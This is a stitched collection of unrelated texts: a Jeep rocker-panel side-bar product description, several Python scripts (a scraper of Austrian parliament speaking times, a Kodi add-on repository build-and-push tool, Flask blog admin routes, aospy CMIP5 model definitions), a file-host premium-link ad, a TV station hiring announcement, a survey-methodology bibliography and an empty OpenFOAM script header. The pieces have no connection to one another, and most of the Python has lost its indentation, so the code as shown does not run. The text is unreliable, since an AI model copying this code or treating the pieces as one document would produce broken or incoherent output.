Double Side Bars, Rubicon Silver™. Protect Your Rocker Panels With Heavy Wall Steel Tube. Trick Tube Design Protects The Lower Rocker Panel And The Side Of The Jeep's Body. The Two Door Model Bolts On In The Up Position For Maximum Body Protection. The Four Door Model Can Be Reversed To Be Used As A Step For Easier Exit And Entrance Into The Vehicle, Or Reversed As The Name Indicates And Used For Maximum Side Body Protection When Four Wheeling. Provides ¼ In. Of Steel Between Your Jeep And Anything You Come Up Against. Includes A Heavy Duty Stanchion Between Tubes For Extra Strength. Easily Bolts On, No Drilling Required.
|
import bs4 # BeautifulSoup HTML parser
import urllib2 # open URLs
import json # store data in a portable way
def parseData(htmlData, timeTable):
"""
The purpose of this function is to extract the interessting data from the
preloaded HTML page. This is done by using BeautifulSoup
"""
soup = bs4.BeautifulSoup(htmlData)
title = soup.find('title') # extract title and date information
title = title.text
start= title.find('am') # find begin of date string
if start != -1:
date = title[start+2:].strip().split()
else:
start= title.find('-')
date = title[start+2:].strip().split()
    # extract all tables with a summary indicating the people of the debate
table = soup.findAll('table', {'class': 'tabelle tabelleHistorie', \
'summary' : 'Rednerinnen und Redner der Debatte'})
for tab in table: # iterate over all tables extract the required information
topic = tab.find_previous_sibling("h3",{'style': 'padding-top: 0.5em;'}).text
fields = tab.findAll('td')
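        # each speaker row spans 9 <td> cells; the columns used below are
        # index 2 (presumably the speaker, used as the dict key), 4 (extra info)
        # and 6 (speaking time as mm:ss)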
for i in range(len(fields)/9):
try:
#print fields[i*9+4].text.strip()
tmp = fields[i*9+6].text.strip().replace(':',' ').split()
if fields[i*9+2].text.strip() not in timeTable.keys():
timeTable[fields[i*9+2].text.strip()] = []
timeTable[fields[i*9+2].text.strip()].append([int(tmp[0])*60 + int(tmp[1]),topic,fields[i*9+4].text.strip()])
            except:
                # skip rows that do not parse (header cells or malformed time fields)
                continue
#print fields[i*9+2].text.strip(), fields[i*9+6].text.strip()
return date
def parseFullSet(s, timeTable):
"""
iterate over a full legislature period, this hast to be specified using
roman numbers.
"""
# allow up to 300 debate days, this is VERY unlikely to be exceeded
for i in range(300):
try:
page = 'http://www.parlament.gv.at/PAKT/VHG/{0}/NRSITZ/NRSITZ_{1:0>5}/index.shtml'.format(s,i)
print page
webpage = urllib2.urlopen(page)
table = {}
date = parseData(webpage,table)
print len(date), date
if len(date) != 3:
date = timeTable[-1][2:5]
print "neues d=", date
timeTable.append([s,i,date[0],date[1],date[2],table])
# in case the URL doesn't exist we ignore it
except urllib2.URLError:
continue
if __name__ == "__main__":
timeTable = []
parseFullSet('XX',timeTable)
parseFullSet('XXI',timeTable)
parseFullSet('XXII',timeTable)
parseFullSet('XXIII',timeTable)
parseFullSet('XXIV',timeTable)
parseFullSet('XXV',timeTable)
f = open("speakerTimeTable.json", "w")
json.dump(timeTable, f)
f.close()
#for i in timeTable:
# for j in i[5]:
# print i[0], i[1], i[2], i[3], i[4], j, i[5][j]
#print timeTable
|
MexaShare is an online cloud file hosting provider where you can upload, back up, store and share all your files with your friends and family or with the whole web.
MexaShare premium link generators use MexaShare premium accounts to convert your MexaShare links to direct HTTP links.
MexaShare is online for all users! You can use it for free, but with a MexaShare premium account you will get a lot of benefits!
|
import os
import shutil
toolsdir = os.path.dirname(os.path.abspath(__file__))
base_path = os.path.split(toolsdir)[0]
datadir = '_repo'
toolsdir = "_tools"
output = os.path.join(base_path, datadir)
#print 'Output directory is %s'% output
wslivetv = 'https://github.com/welwel2/wslivetv.git#dev'
#wslivetv = 'https://github.com/welwel2/wslivetv.git:plugin.video.wslivetv'
wslivestream = 'https://github.com/welwel2/wslivestream.git:plugin.video.wslivestream'
wsteledunet = 'https://github.com/welwel2/wsteledunet.git:plugin.video.wsteledunet'
wsrepo = 'https://github.com/welwel2/wsrepo.git:_repo/repository.wsrepo'
addons = [wslivetv, wslivestream, wsteledunet, wsrepo]
addons_str = ''.join('%s '%addon for addon in addons)
def update_remote(repo_path, rm='origin'):
    # the objective here is to develop code to push the wsrepo changes to the server
    # the steps required are:
# 1. commit the changes locally
# 2. push changes to server
from git import Repo
repo = Repo(repo_path) # instantiate the repo
assert not repo.bare # ensure that the repo is not empty
    if repo.is_dirty(): # check if there are changes that need to be committed
# commit changes
# master = repo.heads.master
# repo.head.reference = master # switch to master branch
#git.checkout('--', '*.py[oc]')
index = repo.index
#for (path, stage), entry in index.entries.items():
# print path, stage
#repo.index.rm('*')
repo.index.add('*')
repo.index.add(repo.untracked_files)
repo.index.commit("commit changes")
        print 'committed changes'
else:
print "repo is clean no changes to commit"
    remote = getattr(repo.remotes, rm)
assert remote.exists()
    try:
        remote.push()
    except:
        # fall back to an external push helper if the direct push fails
        import push
        pp = push.PushProject()
        pp.get_git()
    print 'pushed changes'
#print 'addons paths are %s'%addons_str
def delete_output():
if os.path.exists(output):
shutil.rmtree(output)
os.chdir(os.path.join(base_path, toolsdir))
if __name__ == "__main__":
delete_output()
os.system(r'py -3 create_repository.py --datadir=%s %s'%(output, addons_str))
update_remote(base_path)
|
Trading in cowboy boots for ski boots, Blair Nelson is making the move from Tegna’s WFAA in Dallas to Denver to head up marketing for KUSA.
KUSA, Denver’s NBC affiliate owned by Tegna, has named Blair Nelson as its director of marketing and brand.
Nelson, formerly at Tegna-owned ABC affiliate WFAA in Dallas, where she oversaw the creative marketing department, is an Emmy Award-winning brand manager.
In her role, Nelson will collaborate with the station’s leadership team on integrated marketing planning and strategy, fostering nontraditional partnerships in the Denver market, creating multiplatform campaigns to support the station’s brand and connecting the KUSA audience with its TV, digital and social content.
“Blair is an energetic leader and creative brand builder,” said Steve Carter, KUSA’s general manager.
Prior to joining WFAA, she held senior account management roles at several advertising agencies, leading campaigns for Chevrolet and MillerCoors.
Nelson’s accolades include Edward R. Murrow Award-winning newscast contributor, ABC Social Media Advisory Board, Tegna’s Rising Star program, an Addy Award Gold for local television campaign and a Lone Star Chapter Emmy for best promotion campaign.
Nelson received her BA in public relations from Drake University, where she competed as an NCAA Division 1 student-athlete. She also earned a certificate of leadership from Southern Methodist University in Dallas.
|
from flask import render_template, request, redirect, url_for, g, jsonify, flash
from flask_login import login_required
from app.models import Blog, Category
from app import avatars
from app.decorators import admin_required
from . import admin
@admin.route('/blogs/add/', methods=['GET', 'POST'])
@login_required
@admin_required
def add_blog():
from .forms import BlogForm
form = BlogForm()
g.open_article = True
if form.validate_on_submit():
try:
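            # save the uploaded file via the 'avatars' upload set (Flask-Uploads style API)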
filename = avatars.save(request.files['avatars'])
        except Exception:
            flash('Upload failed, please check the file format')
            return render_template('admin/add_blog.html', form=form)
file_url = avatars.url(filename)
form.avatars.data = file_url
Blog.from_form(form)
return redirect(url_for('main.index'))
return render_template('admin/add_blog.html', form=form)
@admin.route('/blogs/edit/<int:id>/', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_blog(id):
from .forms import EditBlogForm
blog = Blog.query.get_or_404(id)
form = EditBlogForm(title=blog.title,
category=blog.category_id,
summary=blog.summary,
blog_body=blog.body)
if form.validate_on_submit():
blog.title = form.title.data
blog.category_id = form.category.data
blog.summary = form.summary.data
blog.body = form.blog_body.data
blog.save()
return redirect(url_for('main.get_blog', id=id))
return render_template('admin/edit_blog.html', form=form)
@admin.route('/blogs/')
@login_required
@admin_required
def get_blogs():
g.open_article = True
return render_template('admin/blogs.html')
@admin.route('/api/categories/')
@login_required
@admin_required
def categories():
categories = Category.query.all()
data = [cate.to_dict() for cate in categories]
res = {'data': data}
return jsonify(res)
@admin.route('/api/blogs/')
@login_required
@admin_required
def blogs():
blogs = Blog.query.all()
data = [blog.to_dict() for blog in blogs]
res = {'data': data}
return jsonify(res)
|
"""aospy.Model objects corresponding to CMIP5 data."""
import datetime
import os
from aospy.model import Model
from .. import runs
root_dir = '/archive/pcmdi/repo/CMIP5/output/'
# BCC
bcc_csm1 = Model(
name='bcc_csm1-1',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'BCC/BCC-CSM1-1')),
grid_file_paths=[
'/archive/pcmdi/repo/CMIP5/output/BCC/BCC-CSM1-1/historical/fx/atmos/'
'fx/r0i0p0/v1/orog/orog_fx_bcc-csm1-1_historical_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/BCC/BCC-CSM1-1/historical/fx/atmos/'
'fx/r0i0p0/v1/sftlf/sftlf_fx_bcc-csm1-1_historical_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/BCC/BCC-CSM1-1/historical/fx/atmos/'
'fx/r0i0p0/v1/areacella/areacella_fx_bcc-csm1-1_historical_r0i0p0.nc',
],
# data_dur=30,
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# BNU
bnu_esm = Model(
name='bnu_esm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'BNU/BNU-ESM')),
runs=[runs.amip],
default_runs=False
)
# CCCma
cccma_canam4 = Model(
name='cccma_canam4',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CCCma/CanAM4')),
repo_version=0,
# data_dur=30,
# data_start_date=datetime.datetime(1950, 1, 1),
# data_end_date=datetime.datetime(2009, 12, 31),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cccma_cancm4 = Model(
name='cccma_cancm4',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CCCma/CanCM4')),
runs=[runs.amip],
default_runs=False
)
cccma_canesm2 = Model(
name='cccma_canesm2',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CCCma/CanESM2')),
runs=[runs.amip],
default_runs=False
)
# CMCC
cmcc_cesm = Model(
name='cmcc-cesm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CMCC/CMCC-CESM')),
runs=[runs.amip],
default_runs=False
)
cmcc_cm = Model(
name='cmcc-cm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CMCC/CMCC-CM')),
runs=[runs.amip],
default_runs=False
)
cmcc_cms = Model(
name='cmcc-cms',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CMCC/CMCC-CMS')),
runs=[runs.amip],
default_runs=False
)
# CNRM-CERFACS
cnrm_cm5 = Model(
    name='cnrm-cm5',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CNRM-CERFACS/CNRM-CM5')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cnrm_cm5_2 = Model(
    name='cnrm-cm5-2',
    description='',
    # data_dir_struc='gfdl_repo',
    # data_direc=os.path.realpath(os.path.join(root_dir, 'CNRM-CERFACS/CNRM-CM5-2')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# COLA-CFS
cola_cfsv2 = Model(
name='cola-cfsv2-2011',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'COLA/CFSv2-2011')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# CSIRO-BOM
csiro_bom_access1_0 = Model(
name='csiro-bom-access1-0',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CSIRO-BOM/CSIRO-ACCESS1-0')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
csiro_bom_access1_3 = Model(
name='csiro-bom-access1-3',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CSIRO-BOM/CSIRO-ACCESS1-3')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# CSIRO-QCCCE
csiro_qccce_mk3_6_0 = Model(
name='csiro-qccce-mk3-6-0',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CSIRO-QCCCE/CSIRO-Mk3-6-0')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# FIO
fio_esm = Model(
name='fio-esm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'FIO/FIO-ESM')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# ICHEC
ichec_ec_earth = Model(
name='ichec_ec_earth',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'ICHEC/EC-EARTH')),
repo_ens_mem='r3i1p1',
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# INM
inm_cm4 = Model(
name='inm-cm4',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'INM/INM-CM4')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# INPE
inpe_hadgem2_es = Model(
name='inpe-hadgem2-es',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'INPE/HadGEM2-ES')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# IPSL
ipsl_cm5a_lr = Model(
name='ipsl-cm5a-lr',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'IPSL/IPSL-CM5A-LR')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
ipsl_cm5a_mr = Model(
name='ipsl-cm5a-mr',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'IPSL/IPSL-CM5A-MR')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
ipsl_cm5b_lr = Model(
name='ipsl-cm5b-lr',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'IPSL/IPSL-CM5B-LR')),
grid_file_paths=[
'/archive/pcmdi/repo/CMIP5/output/IPSL/IPSL-CM5B-LR/piControl/fx/'
'atmos/fx/r0i0p0/v20120430/orog/'
'orog_fx_IPSL-CM5B-LR_piControl_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/IPSL/IPSL-CM5B-LR/piControl/fx/'
'atmos/fx/r0i0p0/v20120430/areacella/'
'areacella_fx_IPSL-CM5B-LR_piControl_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/IPSL/IPSL-CM5B-LR/piControl/fx/'
'atmos/fx/r0i0p0/v20120430/sftlf/'
'sftlf_fx_IPSL-CM5B-LR_piControl_r0i0p0.nc',
],
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# LASG-CESS
lasg_cess_fgoals_g2 = Model(
name='lasg-cess-fgoals-g2',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'LASG-CESS/FGOALS-g2')),
repo_version=0,
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# LASG-IAP
lasg_iap_fgoals_g1 = Model(
name='lasg-iap-fgoals-g1',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'LASG-IAP/FGOALS-g1')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
lasg_iap_fgoals_s2 = Model(
name='lasg-iap-fgoals-s2',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'LASG-IAP/FGOALS-s2')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# MIROC
miroc4h = Model(
name='miroc4h',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MIROC/MIROC4h')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
miroc5 = Model(
name='miroc5',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MIROC/MIROC5')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
miroc_esm = Model(
name='miroc-esm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MIROC/MIROC-ESM')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
miroc_esm_chem = Model(
name='miroc-esm-chem',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MIROC/MIROC-ESM-CHEM')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# MOHC (Met Office Hadley Centre)
mohc_hadcm3 = Model(
name='mohc_hadcm3',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MOHC/HadCM3')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mohc_hadgem2_a = Model(
name='mohc_hadgem2a',
description='',
# data_dir_struc='gfdl_repo',
repo_version=1,
# data_direc=os.path.realpath(os.path.join(root_dir, 'MOHC/HadGEM2-A')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mohc_hadgem2_cc = Model(
name='mohc_hadgem2cc',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MOHC/HadGEM2-CC')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mohc_hadgem2_es = Model(
name='hadgem2-es',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MOHC/HadGEM2-ES')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# MPI-M
mpi_m_esm_lr = Model(
name='mpi-esm-lr',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MPI-M/MPI-ESM-LR')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mpi_m_esm_mr = Model(
name='mpi-esm-mr',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MPI-M/MPI-ESM-MR')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mpi_m_esm_p = Model(
name='mpi-esm-p',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MPI-M/MPI-ESM-P')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# MRI
mri_agcm3_2h = Model(
name='mri-agcm3-2h',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MRI/MRI-AGCM3-2H')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mri_agcm3_2s = Model(
name='mri-agcm3-2s',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MRI/MRI-AGCM3-2S')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mri_cgcm3 = Model(
name='mri-cgcm3',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MRI/MRI-CGCM3')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mri_esm1 = Model(
name='mri-esm1',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MRI/MRI-ESM1')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NASA-GISS
nasa_giss_e2_h = Model(
name='giss-e2-h',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NASA-GISS/GISS-E2-H')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
nasa_giss_e2_h_cc = Model(
name='giss-e2-h-cc',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NASA-GISS/GISS-E2-H-CC')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
nasa_giss_e2_r = Model(
name='giss-e2-r',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NASA-GISS/GISS-E2-R')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
nasa_giss_e2_r_cc = Model(
name='giss-e2-r-cc',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NASA-GISS/GISS-E2-R-CC')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NASA-GMAO
nasa_gmao_geos_5 = Model(
name='gmao-geos-5',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NASA-GMAO/GEOS-5')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NCAR
ncar_ccsm4 = Model(
name='ncar-ccsm4',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NCAR/CCSM4')),
grid_file_paths=[
'/archive/pcmdi/repo/CMIP5/output/NCAR/CCSM4/piControl/fx/atmos/fx/'
'r0i0p0/v20120413/orog/orog_fx_CCSM4_piControl_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/NCAR/CCSM4/piControl/fx/atmos/fx/'
'r0i0p0/v20120413/sftlf/sftlf_fx_CCSM4_piControl_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/NCAR/CCSM4/piControl/fx/atmos/fx/'
'r0i0p0/v20120213/areacella/areacella_fx_CCSM4_piControl_r0i0p0.nc',
],
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NCC
ncc_noresm1_m = Model(
name='ncc-noresm1-m',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NCC/NorESM1-M')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
ncc_noresm1_me = Model(
name='ncc-noresm1-me',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NCC/NorESM1-me')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NCEP
ncep_cfsv2_2011 = Model(
name='ncep_cfsv2-2011',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NCEP/CFSv2-2011')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NIMR-KMA
nimr_kma_hadgem2_ao = Model(
name='nimr-kma-hadgem2-ao',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NIMR-KMA/HadGEM2-AO')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NOAA-GFDL
gfdl_cm2_1 = Model(
name='gfdl_cm2.1',
description='NOAA GFDL CM2.1 AOGCM',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-CM2')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
gfdl_cm3 = Model(
name='gfdl_cm3',
description='NOAA GFDL CM3 AOGCM',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-CM3')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
gfdl_esm2m = Model(
name='gfdl_esm2m',
description='NOAA GFDL ESM2M earth-system model',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-ESM2M')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
gfdl_esm2g = Model(
name='gfdl_esm2g',
description='NOAA GFDL ESM2G earth-system model',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-ESM2G')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
gfdl_hiram_c180 = Model(
name='gfdl_hiram-c180',
description='NOAA GFDL HIRAM-C180 AGCM',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-HIRAM-C180')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
gfdl_hiram_c360 = Model(
name='gfdl_hiram-c360',
description='NOAA GFDL HIRAM-C360 AGCM',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-HIRAM-C360')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NSF-DOE-NCAR
cesm1_bgc = Model(
name='cesm1-bgc',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NSF-DOE-NCAR/CESM1-BGC')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cesm1_cam5 = Model(
name='ncar_cesm1_cam5',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NSF-DOE-NCAR/CESM1-CAM5')),
grid_file_paths=['/archive/s1h/cmip5/cam5_land_mask/cam5_land_mask.nc'],
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cesm1_cam5_1_fv2 = Model(
name='cesm1-cam5-1-fv2',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NSF-DOE-NCAR/CESM1-CAM5-1-FV2')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cesm1_fastchem = Model(
name='cesm1-fastchem',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NSF-DOE-NCAR/CESM1-FASTCHEM')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cesm1_waccm = Model(
name='cesm1-waccm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NSF-DOE-NCAR/CESM1-WACCM')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# SMHI
smhi_ec_earth = Model(
name='smhi_ec_earth',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'SMHI/EC-EARTH')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# UNSW
unsw_csiro_mk3l_1_2 = Model(
name='unsw-csiro-mk3l-1-2',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'UNSW/CSIRO-Mk3L-1-2')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
|
Survey methodology, accuracy of collected information, survey questionnaire design, the psychology of survey response, methodology for sensitive topics, the impact of data collection.
Groves R.M., Fowler F.J., Couper M.P., Lepkowski J.M., Singer E., Tourangeau R. Survey Methodology. N.Y.: Wiley. 2004.
Tourangeau R., Rips L.J., Rasinski K. The Psychology of Survey Response. Cambridge: Cambridge University Press. 2000.
Cognition and Survey Research / M.G. Sirken, D.J. Herrmann, S. Schechter, N. Schwarz, J. Tanur, R. Tourangeau. New York: Wiley. 1999.
Jabine T., Straf M., Tanur J., Tourangeau R. Cognitive Aspects of Survey Design: Building a Bridge Between Disciplines. Washington: National Academy Press. 1984.
Tourangeau R. Survey questionnaire design // Encyclopedia of Statistics in Behavioral Science / Ed. by B. Everitt, D. Howell. Vol. 4. West Sussex: John Wiley, 2005.
Lee S., Mathiowetz N.A., Tourangeau R. Perceptions of Disability: The Effects of Self- and Proxy Response // Journal of Official Statistics. 2004. Vol. 20. P. 671-686.
Couper M.P., Singer E., Tourangeau R. Understanding the effects of audio-CASI on self-reports of sensitive behavior // Public Opinion Quarterly. 2003. Vol. 67. P. 385-395.
Tourangeau R., Singer E., Presser S. Context effects in attitude surveys: Effects on remote items and impact on predictive validity // Sociological Methods and Research. 2003. Vol. 31. 486-513.
Tourangeau R. Cognitive aspects of survey measurement and mismeasurement // International Journal of Public Opinion Research. 2003. Vol. 15. P. 3-7.
Tourangeau R., Smith T.W., Rasinski K. Motivation to report sensitive behaviors in surveys: Evidence from a bogus pipeline experiment // Journal of Applied Social Psychology. 1997. Vol. 27. P. 209-222.
Tourangeau R., Smith, T. Asking sensitive questions: The impact of data collection, question format, and question context // Public Opinion Quarterly 1996. Vol. 60. P. 275-304.
Tourangeau R., Rasinski K. Cognitive processes underlying context effects in attitude measurement // Psychological Bulletin. 1988. Vol. 103. P. 299-314.
Zhurnal sotsiologii i sotsialnoy antropologii (The Journal of Sociology and Social Anthropology). 2006. Vol. 9. No. 1. P. 195-202.
Sotsiologicheskiy zhurnal (Sociological Journal). 1994. No. 3. P. 157-185.
Sotsiologicheskie issledovaniya (Sociological Studies). 2008. No. 5. P. 26-36.
|
#------------------------------------------------------------------------------------------------------------
#
# This program averages openfoam probe data azimuthally. If variable is a scalar it also outputs the std-dev
#
